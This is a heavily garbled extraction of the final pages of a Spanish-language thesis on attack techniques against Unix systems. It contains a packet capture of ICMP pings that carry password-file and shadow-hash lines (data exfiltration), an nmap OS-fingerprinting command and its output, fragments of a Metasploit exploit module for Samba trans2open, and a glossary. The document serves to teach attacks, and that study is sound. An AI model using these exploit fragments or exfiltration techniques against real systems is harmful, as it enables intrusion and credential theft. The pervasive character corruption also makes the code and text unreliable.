)+ 0! (0 65 6! 30 65 65 69 96 b+ 00 +f 6e 6f 3a (0 7) 6e 5b !0 63 77 7+ 67 3a 57 69 (f 1f a) 6! 6e 3a 69 30 65 73 6e 0) 00 61 65 (f 6e 3a 6( 7+ 6f 00 0( 76 7( 75 0a 30 (0 65 6! +5 !0 65 3a 73 77 3a +f 6e 6f 00 a) 6( (f 7( 77 57 77 7+ 67 ..:..e..1.-...<. ..tD..I......... .....d....!"a@eb a!67oore O>ner:; noneDi tent:;u r ; bin;no"ogin.>> >:Q:)0:)0::0:0:& or"7 &i7e &eb O> ner:;noneDi tent :;u r; bin;no"og in
Brame (7 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6:4 D t: 00:17:31:96:5b:1f 900:17:31:96:5b:1f: 8nternet Proto!o"4 .r!: 19(.16).0.30 919(.16).0.30:4 D t: 19(.16).0.( 919(.16).0.(: 8nternet ,ontro" 3e age Proto!o" TEpe: ) 9<!'o 9ping: reque t: ,o7e: 0 9: ,'e!6 um: 0D(!17 -!orre!t0 87entifier: 0D1)1( .equen!e number: 33() 90D0700: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7(0#6<6B6(6B6+793#(#3#36... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 3a 30 73 3a 69 5a 5) 17 9+ 0( 63 36 3a 65 (f 6e 51 +! 31 6f 0) 6b 35 55 7( 75 0a +( 96 99 00 6+ 35 6e 3a 73 67 37 5b 00 (! 6f 33 70 (f 7( 61 +b 1f 00 17 6f 3+ 7( 6e (f 7( 6+ 00 +0 1) 7( 3a 69 6f 73 63 (+ 0! 01 1( 0a 36 76 6e 6( 65 5) (9 )9 07 6e 35 69 65 69 6! 51 e1 5f 00 6f 35 6! 7) 6e 6f +5 a( !0 63 6( 33 65 69 (f 3a 3( (6 a) 6! 6f 3+ 67 73 6e (+ 77 0) 00 61 6+ 3a 65 7+ 6f 31 +7 00 1e 76 79 3a 6+ 65 6! (+ +7 +5 !0 65 3a 30 (0 6e 6f (f +( 00 a) 6( (a 3a 75 7+ 67 69 ++ ..1.-...:..e..<. ..o...I..A...... ....4.....!"a@eb a!67oor.nobo7E:Q :6553+:6553+::0: 0:Knpri@i"ege7 u er:;noneDi tent :;u r; bin;no"og in.mar!e"o:M1M;i URC757MGR<(>3HCD G2
Brame () 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:17:31:96:5b:1f 900:17:31:96:5b:1f:4 D t: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6: 8nternet Proto!o"4 .r!: 19(.16).0.( 919(.16).0.(:4 D t: 19(.16).0.30 919(.16).0.30: 8nternet ,ontro" 3e age Proto!o" TEpe: 0 9<!'o 9ping: rep"E:
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 2.. de 22O
Brame (9 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6:4 D t: 00:17:31:96:5b:1f 900:17:31:96:5b:1f: 8nternet Proto!o"4 .r!: 19(.16).0.30 919(.16).0.30:4 D t: 19(.16).0.( 919(.16).0.(: 8nternet ,ontro" 3e age Proto!o" TEpe: ) 9<!'o 9ping: reque t: ,o7e: 0 9: ,'e!6 um: 0D+!5) -!orre!t0 87entifier: 0D1)1( .equen!e number: 35)+ 90D0e00: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7(7(31(B6,6C516951+B5#(B... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 5a 30 6+ 6f (f 00 00 17 9+ 0( 63 (f 3a 65 3a 6( 00 00 31 !a 0) 6b 3a +7 7a (f 61 00 96 0) 00 6+ 31 61 3a 75 73 00 5b 00 +! 6f 30 7( (f 73 6) 00 1f 00 5) 6f 30 63 6) 7( 0a 00 00 +0 1) 7( 31 65 6f (f 00 00 0! 01 1( 7( 3a 6! 67 6! 00 00 (9 (e 0e 31 31 6f 65 6f 00 00 e1 f0 00 (f 30 (0 (f 63 00 00 a( !0 63 6! 30 +6 67 61 00 00 (6 a) 6! 6b 31 65 61 6! 00 00 0) 00 61 51 3a 7( 7( (f 00 00 00 1e 76 69 3a 6e 63 6( 00 00 +5 !0 65 51 30 61 65 69 00 00 00 a) 6( +f 3a 6e 6! 6e 00 00 ..1.-...:..e..<. ......I......... ....2G....!"a@eb a!67oorr1;"6RiRO U;:1001:1001::0: 0:3ar!e"o Bernan 7eO:;'ome;mar!e" o:;u r;"o!a";bin ;ba '........... ................ ..
Brame 30 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:17:31:96:5b:1f 900:17:31:96:5b:1f:4 D t: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6: 8nternet Proto!o"4 .r!: 19(.16).0.( 919(.16).0.(:4 D t: 19(.16).0.30 919(.16).0.30: 8nternet ,ontro" 3e age Proto!o" TEpe: 0 9<!'o 9ping: rep"E: ,o7e: 0 9: ,'e!6 um: 0D5+5) -!orre!t0 87entifier: 0D1)1( .equen!e number: 35)+ 90D0e00: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7(7(31(B6,6C516951+B5#(B... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 5a 30 6+ 6f (f 00 00 0! 9+ 1e 63 (f 3a 65 3a 6( 00 00 (9 7+ 00 6b 3a +7 7a (f 61 00 e1 +6 00 6+ 31 61 3a 75 73 00 a( 00 5+ 6f 30 7( (f 73 6) 00 (6 00 5) 6f 30 63 6) 7( 0a 00 00 +0 1) 7( 31 65 6f (f 00 00 17 01 1( 7( 3a 6! 67 6! 00 00 31 )+ 0e 31 31 6f 65 6f 00 00 96 b( 00 (f 30 (0 (f 63 00 00 5b !0 63 6! 30 +6 67 61 00 00 1f a) 6! 6b 31 65 61 6! 00 00 0) 00 61 51 3a 7( 7( (f 00 00 00 0( 76 69 3a 6e 63 6( 00 00 +5 !0 65 51 30 61 65 69 00 00 00 a) 6( +f 3a 6e 6! 6e 00 00 ..:..e..1.-...<. ..tB..I......... ....TG....!"a@eb a!67oorr1;"6RiRO U;:1001:1001::0: 0:3ar!e"o Bernan 7eO:;'ome;mar!e" o:;u r;"o!a";bin ;ba '........... ................ ..
Brame 31 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6:4 D t: 00:17:31:96:5b:1f
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 2.* de 22O
Brame 3( 916( bEte on >ire4 16( bEte !apture7: <t'ernet 884 .r!: 00:17:31:96:5b:1f 900:17:31:96:5b:1f:4 D t: 00:0!:(9:e1:a(:(6 900:0!:(9:e1:a(:(6: 8nternet Proto!o"4 .r!: 19(.16).0.( 919(.16).0.(:4 D t: 19(.16).0.30 919(.16).0.30: 8nternet ,ontro" 3e age Proto!o" TEpe: 0 9<!'o 9ping: rep"E: ,o7e: 0 9: ,'e!6 um: 0D390+ -!orre!t0 87entifier: 0D1)1( .equen!e number: 3)+0 90D0f00: Data 91(0 bEte : Data: 636,6176656(61636C6+6B6B7((3(0(++67(6565+(53++3#... 0000 0010 00(0 0030 00+0 0050 0060 0070 00)0 0090 00a0 00 00 00 61 ++ 7( 3( 3a 0a 30 7( 0! 9+ 1e 63 3a (e 30 35 (3 30 +) (9 7+ 00 6b (0 70 30 36 0a 6! e1 +7 00 6+ 73 61 35 (0 7( (+ a( 00 39 6f 7( 73 (f 6( 6f 50 (6 00 0+ 6f 63 73 30 7( 6f +3 00 +0 1) 7( (f 77 36 6f 7+ +f 17 01 1( (3 65 6+ (f 6f 3a 6( 31 )+ 0f (0 7+ (! 30 6b (+ 37 96 b1 00 (+ 63 76 36 73 31 57 5b !0 63 +6 (f (0 (0 (0 (+ 6+ 1f a) 6! 7( 67 31 3( +5 71 67 0) 00 61 65 61 (e 30 7) +6 5( 00 0( 76 65 73 3+ 3a 70 71 6! +5 !0 65 +( 7+ 30 31 (0 6b 51 00 a) 6( 53 65 (0 39 (+ (e 6+ ..:..e..1.-...<. ..tH..I......... ....9.....!"a@eb a!67oorN MBreeC. D: r!;et!;ma te r.pa >74@ 1.+0 (005;06;06 (0:19 :56 broo6 <Dp M .N.root:M1MqBq6. 00"MP,Ob7&7g$"R7 r?
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 2.2 de 22O
2na vez que se intenta realizar una detecci8n de un ,? re oto con @ a"# es "robable que ste desconozca qu $a' Cdel otro ladoD ' devuelva co o resultado el CnuevoD /inger"rint. Esto "or eje "lo "uede suceder cuando no se dis"one de una versi8n u' actualizada de @ a" ' el ,? re oto es relativa ente
u7o .;nmap -@ -O 19(.16).0.30
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 2.- de 22O
Co o se "uede ver# los C<etr'ing ?, detection ;tr' c*>D in/or an sobre la ejecuci8n de cada uno de los 5 tests detallados en el a"artado 5.*.*. :uego# co o no "osee la /ir a del ,? re oto en su B5# @ a" la i "ri e "or "antalla. El ,? en cuesti8n es un FreeB,5 +..# cu'a /ir a la versi8n 1.5- de @ a" aGn no "osee*+5. :uego de "rocesar un "oco el te9to del /inger"rint ;i "reso as) "or @ a" a "ro"8sito "ara /acilitar el "roceso de re"orte del "ri era instancia%
-$%9!=1+.53 D1+;( OT1(1 ,T11 ,K130++7 P=1/ D.11 H1/ 31000,(9 T31+7B3,C1+ P1D)6A6+-un6no>n-"inuD-gnu" -CH!.P1105 H,D1( 8.$110) T818 8818 ..1. T.1(1" -CH!.P1100 H,D11 8.$110< T818 8818 ..1. T.1(0" -CH!.P110+ H,D11 8.$110# T818 8818 ..1. T.1(1" -CH!.P1105 H,D11 8.$110) T818 8818 ..1. T.1(0" -CH!.P1105 H,D11 8.$1107 T818 8818 ..1. T.1(1" 4*-!O1135C+N&3.T11 O(1357)N&3.T11 O313()0N&3NNT11 O+135C+N&3.T11 O513(1)N&3.T11 O613109.T11" LI9!&11BBBB &(1BBBB &31BBBB &+1BBBB &51BBBB &61BBBB" C$9!$1/ DB1/ T1+0 &1BBBB O135C+N&3.2N ,,1N R1" 21!$1/ DB1/ T1+0 .1O #1.P B1#. $D10 R1" 22!$1N" 2 !$1/ DB1/ T1+0 &1BBBB .1O #1.P B1#. O13109N&3.T11 $D10 R1" 2.!$1/ DB1/ T1+0 &10 .1# #1U B1$ O1 $D10 R1" 21!$1/ DB1/ T1+0 &10 .1U #1.P B1#$ O1 $D10 R1" 26!$1/ DB1/ T1+0 &10 .1# #1U B1$ O1 $D10 R1" 20!$1/ DB1/ T1+0 &10 .1U #1. B1#$ O1 $D10 R1" F1!$1/ DB1N T1+0 TO.10 8P213) KN10 $8P21H $8D1H $8P,51H $K,51H $K21H $KD1H" IC!$1/ DB81. T1+0 TO.81. ,D1. .81. D281."
*+5 Cabe aclarar que la Glti a versi8n de @ a"# la 1.J. 'a inclu'e la /ir a de este ,? en su Base. Fa bin se "uede obtener la Glti a versi8n del arc$ivo con la base de /ir as de @ a" Cn a"( os(dbD en la siguiente 2<:% $tt"%&&n a".org&data&n a"(os(db ' luego ree "lazar el original. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 2.1 de 22O
:o que "ri ero se $izo /ue% eli inar el "re/ijo C?,%D en cada l)nea ' agregar un /in de l)nea luego de cada "arntesis de cierreH des"us se unieron en una is a l)nea las cadenas que quedaron CcortadasD# ' se identi/ic8 con rojo los resultados de los di/erentes probes. !or Glti o# los s) bolos de "orcentaje se eli inaron ;s8lo indica una concatenaci8n># ' los "ar etros se colorearon con azul. :uego# "ara relacionar este /inger"rint con el "roceso e9"licado en el a"artado 5.*.*# se agregaron co entarios alrededor del te9to ' se agru"aron con res"ecto a cada test "ara /acilitar la co "rensi8n del lector# quedando de la siguiente anera%
N Dato 7e" e !aneo: =er i%n 7e Nmap4 P"ataforma4 Be!'a;?ora4 et!. -$%9!=1+.53 D1+;( OT1(1 ,T11 ,K130++7 P=1/ D.11 H1/ 31000,(9 T31+7B3,C1+ P1D)6A6+-un6no>n-"inuD-gnu" N .O $emoto BreeC.D 7.0-C<T#+ - 7.0-.T#C2< N N Probe T,P en@ia7o : N 1111111111111111 N Te t 1. Henera!i%n 7e .e!uen!ia 9.<R4 OP.4 &8N E T1:. N 1.1 Probe .<R. N Par]metro !a"!u"a7o por !a7a paquete re!ibi7o 7e" Te t 1: N .P: T,P 8.N equen!e pre7i!tabi"itE in7eD N H,D: T,P 8.N Hreate t !ommon 7enominator N 8.$: T,P 8.N !ounter rate N T84884..: T,P 8P8D4 8,3P 8P8D4 .'are7 8P8D N T.: T,P Time tamp option a"gorit'm -CH!.P1105 H,D1( 8.$110) T818 8818 ..1. T.1(1" -CH!.P1100 H,D11 8.$110< T818 8818 ..1. T.1(0" -CH!.P110+ H,D11 8.$110# T818 8818 ..1. T.1(1" -CH!.P1105 H,D11 8.$110) T818 8818 ..1. T.1(0" -CH!.P1105 H,D11 8.$1107 T818 8818 ..1. T.1(1" N 1.( Probe OP.: Op!ione T,P N Op!ione T,P obteni7a por !a7a paquete en@ia7o 7e" Te t 1: 4*-!O1135C+N&3.T11 O(1357)N&3.T11 O313()0N&3NNT11 O+135C+N&3.T11 O513(1)N&3.T11 O613109.T11" N 1.3 &8N: Tamafo 7e =entana T,P 8ni!ia" re!ibi7o por !a7a paquete N en@ia7o 7e" Te t 1. <n ?eDa7e!ima". LI9!&11BBBB &(1BBBB &31BBBB &+1BBBB &51BBBB &61BBBB" N 1.+ Probe T1: N Par]metro obteni7o en to7o "o paquete N abe que er]n to7o igua"e : N $: $e pon i@ene 9$: N DB: 9DonJt Bragment Cit: N T4TH: 8P 8nitia" TT24 8P 8nitia" TT2 Hue N .: T,P .equen!e number N #: T,P #!6 Number 9#: N B: T,P B"ag N $D: T,P $.T Data ,'e!6 um N R: T,P mi !. Ruir6 21!$1/ DB1/ T1+0 .1O #1.P B1#. $D10 R1" N Te t (. <!o 8,3P 98<:. en@ia7o 7e" Te t 1 9Ea e
9No a"ma!ena7o:
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 2.5 de 22O
9No a"ma!ena7o:
N Te t 3. T,P <Dp"i!it !onge tion notifi!ation 9<,N: N Par]metro Obteni7o : N $: $e pon i@ene 9$: N DB: 9DonJt Bragment Cit: N T4TH: 8P 8nitia" TT24 8P 8nitia" TT2 Hue 9No a"ma!ena7o: N &: T,P 8nitia" &in7o> .iOe N O: T,P Option N ,,: <Dp"i!it ,onge tion Notifi!ation N R: T,P 3i !. Ruir6 C$9!$1/ DB1/ T1+0 &1BBBB O135C+N&3.2N ,,1N R1" N Te t +. T,P. Probe T( a" T7. N Par]metro !a"!u"a7o por !a7a Probe: N $: $e pon i@ene 9$: N DB: 9DonJt Bragment Cit: N T4TH: 8P 8nitia" TT24 8P 8nitia" TT2 Hue 9No a"ma!ena7o: N &: T,P 8nitia" &in7o> .iOe N .: T,P .equen!e number N #: T,P #!6 Number N B: T,P B"ag N O: T,P Option N $D: T,P $.T Data ,'e!6 um N R: T,P 3i !. Ruir6 22!$1N" 2 !$1/ DB1/ T1+0 &1BBBB .1O #1.P B1#. O13109N&3.T11 $D10 R1" 2.!$1/ DB1/ T1+0 &10 .1# #1U B1$ O1 $D10 R1" 21!$1/ DB1/ T1+0 &10 .1U #1.P B1#$ O1 $D10 R1" 26!$1/ DB1/ T1+0 &10 .1# #1U B1$ O1 $D10 R1" 20!$1/ DB1/ T1+0 &10 .1U #1. B1#$ O1 $D10 R1" N Probe 5. KDP en@ia7o a un puerto !erra7o en e pera 7e un 8,3P Port N Knrea!'ab"e N Par]metro ,a"!u"a7o N $: $e pon i@ene 9$: N DB: 9DonJt Bragment Cit: N T4TH: 8P 8nitia" TT24 8P 8nitia" TT2 Hue 9No a"ma!ena7o: N TO.: 8P TEpe of .er@i!e N 8P2: 8P Tota" 2engt' N KN: Knu e7 port unrea!'ab"e fie"7 nonOero N $8P2: $eturne7 probe 8P tota" "engt' @a"ue N $8D: $eturne7 probe 8P 8D @a"ue N $8P,5: 8ntegritE of returne7 probe 8P !'e!6 um @a"ue N $K24$K,5: 8ntegritE of returne7 probe KDP "engt' an7 !'e!6 um N $KD: 8ntegritE of returne7 KDP 7ata F1!$1/ DB1N T1+0 TO.10 8P213) KN10 $8P21H $8D1H $8P,51H $K,51H $K21H $KD1H"
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 2.J de 22O
O@erf"o>J4
1> - J'7mJ 04 1> 3.BA28,<N.<4 1> JM$e@i ion: 5365 MJ4 1> - JC8DJ4 J7106J 04 - J,=<J4 J(003-00)5J 04 1> true4 1> J.pa!eJ 1> 10(+4 JCa7,'ar J 1> V[D00V4 J3inNop J 1> 51(4
JTarget J
1> -V.amba (.(.D 2inuD D)6V4 a J#r!'J 1> #$,?AG)64 JP"atformJ 1> J"inuDJ4 J$et J 1> -0D010(030+4 0D+1+(+3++04 b4 04 04 JDi !"o ureDateJ 1> J#pr 7 (003J:: regi terAoption 9-Opt::$PO$T9139:04 sel6.class:
b4
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 2.+ de 22O
# # +end a ,TTrans request -ith Parameter.ountTotal set to the buffer length # ub!omman7 param bo7E etupA!ount etupA7ata data 1 param 1 1 1 1 1 P 1 JJ JJ 0 JJ bo7E
p6t 1 ,ON.T::.3CANTT$#N.AP5T.ma6eA tru!t sel6. imp"e.!"ient. mbA7efau"t 9p6t-JPaE"oa7J0-J.3CJ0: ba eAoff et 1 p6t.toA ."engt' P 9 etupA!ount Q (: - + paramAoff et 1 ba eAoff et 7ataAoff et 1 paramAoff et P param."engt' p6t-JPaE"oa7J0-J.3CJ0.@-J,omman7J0 1 ,ON.T::.3CA,O3ANTAT$#N.#,T p6t-JPaE"oa7J0-J.3CJ0.@-JB"ag 1J0 1 0D1) p6t-JPaE"oa7J0-J.3CJ0.@-JB"ag (J0 1 0D(001 p6t-JPaE"oa7J0-J.3CJ0.@-J&or7,ountJ0 1 19 P etupA!ount p6t-JPaE"oa7J0.@-JParam,ountTota"J0 11(000 p6t-JPaE"oa7J0.@-JData,ountTota"J0 1 bo7E."engt' p6t-JPaE"oa7J0.@-JParam,ount3aDJ0 1 10(+ p6t-JPaE"oa7J0.@-JData,ount3aDJ0 1 6550+ p6t-JPaE"oa7J0.@-JParam,ountJ0 1 param."engt' p6t-JPaE"oa7J0.@-JParamOff etJ0 1 paramAoff et p6t-JPaE"oa7J0.@-JData,ountJ0 1 bo7E."engt' p6t-JPaE"oa7J0.@-JDataOff etJ0 1 7ataAoff et p6t-JPaE"oa7J0.@-J.etup,ountJ0 1 etupA!ount p6t-JPaE"oa7J0.@-J.etupDataJ0 1 etupA7ata p6t-JPaE"oa7J0.@-J.ub!omman7J0 1 ub!omman7 p6t-JPaE"oa7J0.@-JPaE"oa7J0 1 data sel6. imp"e.!"ient. mbA en79p6t.toA : a!6 1 sel6. imp"e.!"ient. mbAre!@Apar e9,ON.T::.3CA,O3ANTAT$#N.#,T: # # +end a ,TTrans secondar/ request -ith the magic displacement # param 1 pattern bo7E 1 JJ data 1 param P bo7E p6t 1 ,ON.T::.3CANTT$#N.A.<,OND#$/AP5T.ma6eA tru!t sel6. imp"e.!"ient. mbA7efau"t 9p6t-JPaE"oa7J0-J.3CJ0: ba eAoff et 1 p6t.toA ."engt' - + paramAoff et 1 ba eAoff et 7ataAoff et 1 paramAoff et P param."engt'
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 2.O de 22O
Con res"ecto al segundo e9"loit# "or una cuesti8n estricta ente de es"acio# se o iti8 su inclusi8n aqu). ,in e bargo# se encuentra online# en la siguiente direcci8n% $tt"%&& arcelo/ernandez.in/o&tesis&-1O.c El is o consiste en *12O l)neas escritas en lenguaje C# ' s8lo necesita un ,? ti"o 2ni9 ' un co "ilador de C ;t)"ica ente PCC> "ara ser co "ilado ' ejecutado. /omo conclusi-n 9a! que resaltar la ventaja que o=rece 1A2 para la creaci-n de exploits% !a que provee un entorno pro(ado con componentes reutili3a(les ! extensi(les para el desarrollo% creaci-n e investi)aci-n de exploits.
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 2.0 de 22O
/luster% Conjunto de co "utadoras que trabajan en gru"o ' actGan co o un nodo Gnico e indivisible# en "os de lograr un objetivo su ando el recurso de cada uno de sus co "onentes. Ler% $tt"%&&en.Ii6i"edia.org&Ii6i&Co "uterUcluster D1S: Sona Desmilitari3ada ;C(emilitari$ed KoneD>. !arte de la red de una organizaci8n que est direccionada ' accesible "Gblica ente desde 7nternet ;general ente># se"arada de la :A@ de la is a. Ler% $tt"%&&en.Ii6i"edia.org&Ii6i&5e ilitarizedUzoneU]2Oco "uting]20 DNA% (omain Game S1stem H ,iste a de @o bres de 5o inio. Es un servicio a "lia ente utilizado# que tiene el objetivo de traducir no bres del ti"o $ost.do inio ;"or eje "lo III.unlu.edu.ar> a una direcci8n 7!# "or eje "lo# 2...**..*O5.21J. DoA: Dene)aci-n de Aervicio ;C(enial of ServiceD>. Error de un so/tIare ;general ente un servicio de red> al anejar ciertos datos de entrada o condiciones que "rovocan que el nor al s situaciones% odi/icadas># dese "eBo del servicio reduzca su velocidad ;'a que su consu o de C!2# <AM u otros recursos crece indiscri inada ente># $asta volverlo ino"erable. El tr ino abarca etc. Ler% $tt"%&&en.Ii6i"edia.org&Ii6i&5enialUo/Uservice Fntrada Fstndar DATDINE% Aalida Fstndar DATD0UTE% Aalida de Fstndar de Frrores DATDFRRE% ,on canales de co unicaci8n con el entorno que e9isten "or cada "roceso 2ni9 del siste a. <e"resentan la entrada de datos# otro la salida ' el Glti o la salida de res"ectiva ente. Ler% $tt"%&&en.Ii6i"edia.org&Ii6i&,tandardUstrea s Lo): 2na entrada de log es uno o s registros al acenados en algGn arc$ivo que re"resenta un evento en "articular# co o una alerta# con el objetivo de guardar un rastro de auditor)a que ser le)do "or el ad inistrador del siste a. 2rame@or:% En so/tIare# un frame.ork ;C arco de trabajoD en ingls> es una biblioteca de "rogra aci8n "ensada co o un gran C"aqueteD que resuelve un cierto "roble a con un nivel de abstracci8n u' grande "ara el "rogra ador que la utiliza. !uede contener o requerir varias bibliotecas "ara su correcto /unciona iento. Ler% $tt"%&&III.code"roject.co &RB&arc$itecture&4$at7sAFra eIor6.as"9 Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 2*. de 22O ensajes de error. !or de/ecto ;' co Gn ente> son el teclado# la "antalla ' la "antalla ta bin o un arc$ivo de log# interru"ci8n o alteraci8n de la cone9i8n de red# saturaci8n de "eticiones ;nor ales o
Ane9o E. ( Ane9o E. Plosario de Fr inos Fa bin% $tt"%&&en.Ii6i"edia.org&Ii6i&,o/tIareU/ra eIor6 8ilos D*hreadsE% :os ,?s consu en todos los odernos "roveen un ecanis o de "rocesos ClivianosD o t$reads# que e oria con el "roceso "rinci"al que los crea# u' co Gn en ' a di/erencia de los "rocesos C"esadosD# co "arten enos recursos ' requieren ,iste as. Ler%
desventaja es el au ento de la co "lejidad# "ero $o' en d)a es una caracter)stica $tt"%&&en.Ii6i"edia.org&Ii6i&F$readU]2Oco "uterUscience]20 8as9% 2n Has o /unci8n de dis"ersi8n es una /unci8n
$tt"%&&en.Ii6i"edia.org&Ii6i&!rocessU]2Oco "uting]20
entrada# genera un valor Gnico de salida ;cu'as "robabilidades de ser generado "or otro "ar etro son )n/i as>. =a' algorit os de $as$ estndar# co o "or eje "lo M55 ' ,=A(*. Ler%$tt"%&&en.Ii6i"edia.org&Ii6i&Cr'"togra"$icU$as$U/unction 8one!pot% 2n $one'"ot ;Ctarro de ielD> es un siste a Ctra "aD instalado adrede "ara ca"tar la onitorear los intentos de atenci8n de "osbiles intrusos# "robable ente con vulnerabilidades sencillas de vencer# con el objetivo de desviar la atenci8n de los $osts que s) son de i "ortancia ' ataque "ara bloquearlos ' a"render las tcnicas utilizadas "or los intrusos. NAT Q +etwork Address *ranslation ;Fraducci8n de 5irecciones de <ed>% Fcnica "ara reescribir la direcci8n origen o destino de un "aquete 7! en un dis"ositivo que aneja dic$os "aquetes. !or u' /recuentes ta bin. eje "lo# es e "leada co Gn ente en los dis"ositivos de acceso a internet "ara Ccon utarD una Gnica 7! "Gblica entre varias 7!s "rivadas de una :A@# entre otros usos Ler% $tt"%&&en.Ii6i"edia.org&Ii6i&@etIor6UaddressUtranslation 0=uscaci-n ;so/tIare>% Fcnica que odi/ica sustancial ente un "rogra a sin alterar su edida su /unciona iento original# con el objetivo de Cca u/larloD o di/icultar en gran del "rogra a. Ler% $tt"%&&en.Ii6i"edia.org&Ii6i&?b/uscatedUcode 0pcode% 2na instrucci8n de "rocesador se co "one general ente "or un c8digo de o"eraci8n ' dos o"erandos. El "ri ero en ingls se lo abrevia co o ?"code# que bsica ente indica qu $acer con los dos o"erandos que se le indica. !or eje "lo# en lenguaje ensa blador# CM?L AA# BAD es una instrucci8n donde se co"ia el contenido del registro BA al AA ;segGn la no enclatura de 7ntel># ' M?L es el ?"code. ?tros ?"codes CM!# Call# A55# M2:# !2,=# !?!# etc. Ler% Fabla r"ida de ?"codes O.OJ% $tt"%&&III.jegerle$ner.co &intel&o"codeUes.$t l 7ntel Arc$itecture ,o/tIare 5evelo"erMs Manual# Lolu e 2% 7nstruction ,et <e/erence Manual% $tt"%&&develo"er.intel.co &design&"entiu & anuals&21-*0*.$t 4enetration Testin)% Fest de "enetraci8nH se lo conoce co o un "roceso t)"ico de las auditor)as de seguridad# donde se si ula ser un crac6er intentando vulnerar la seguridad de una organizaci8n o de un siste a de la is a. 4rox!% 2n "ro9' es un so/tIare o dis"ositivo que o/icia de inter ediario entre un cliente ' un servidor. !or eje "lo# un "rogra a establece cone9i8n con el "ro9' ' le "ide acceder a un cierto equi"o&servicio# "or eje "lo una "gina IebH el "ro9' accede "or l ' lo devuelve al "rogra a original# evitando que ste tenga que acceder directa ente al "roveedor. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 2** de 22O u' co unes en la arquitectura 9OJ inclu'en JM!#
co "rensi8n "or "arte de terceros. Co o e/ecto colateral "uede signi/icar ta bin una co "resi8n
Ane9o E. ( Ane9o E. Plosario de Fr inos RTT% :ound -rip -ime N Fie "o de Liaje 7da ' Luelta. Lalor general ente edido en
ilisegundos que esti a el tie "o entre el env)o ' rece"ci8n de un "aquete al ' desde el destino. !uede decirse que el dela1# latencia o de ora que introduce la red entre dos $osts es igual a <FF dividido 2. Acript% 2n scri"t es un "rogra a que general ente e9tiende a una a"licaci8n# escrita en un lenguaje inter"retado ' que t)"ica ente se encarga de auto atizar tareas. Ler% $tt"%&&en.Ii6i"edia.org&Ii6i&,cri"tingUlanguage A9ell% ,i bien en castellano la traducci8n literal es Cconc$aD o CcscaraD# en el a biente in/or tico se la conoce ta bin co o CConsolaD o CFer inalDH es una inter/az que "rovee el siste a al usuario en /or ato de te9to# que ace"ta 8rdenes o co andos que luego el siste a ejecuta. Fa bin se la suele lla ar C:7# "or Co and :ine 7nter/ace ;C7nter/az de :)nea de a'or)a de Co andoD># ant8ni o de P27 N Pra"$ical 2ser 7nter/ace ;C7nter/az Pr/ica de 2suarioD>. Aoc:ets Ra@% Es una A!7 de la ca"a de <ed de un ,iste a ?"erativo# "resente en la pa1load. @ a" ' la gran ellos# que "rovee acceso co "leto a los encabezados de las tra as a enviar ' recibidas# no s8lo al a'or)a de los "ort scanners o $erra ientas de red $acen uso de ella. ,poofing% C!arodiaD en castellano. CSpoofingD trata de un conjunto de tcnicas "ara /alsi/icar ' $acer "asar un ele ento invlido o no autorizado "or otro que s) lo est. AA8% Secure SHell ;C,$ell ,eguroD en castellano>. !rotocolo de red que brinda una inter/az de co andos a una quina en /or a re otaH a di/erencia de Felnet# <login# etc.# ,,= brinda autenticaci8n "or !R7 ' encri"taci8n del tr/ico. AAL% ,ecure ,oc6ets :a'er# Ca"a de ,oc6ets ,eguro. Es una versi8n anterior de lo que a$ora es F:,# con los is os objetivos ' caracter)sticas. utua ' encri"taci8n "ara "rotocolos /iables de la Ca"a de Frans"orte odelo FC!&7!>. TLA% Frans"ort :a'er ,ecurit'# ,ecuridad en la Ca"a de Frans"orte. Es un "rotocolo de seguridad que "rovee autenticaci8n del Modelo ?,7 ;FC! en el
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 2*2 de 22O
&i(lio)ra=6a
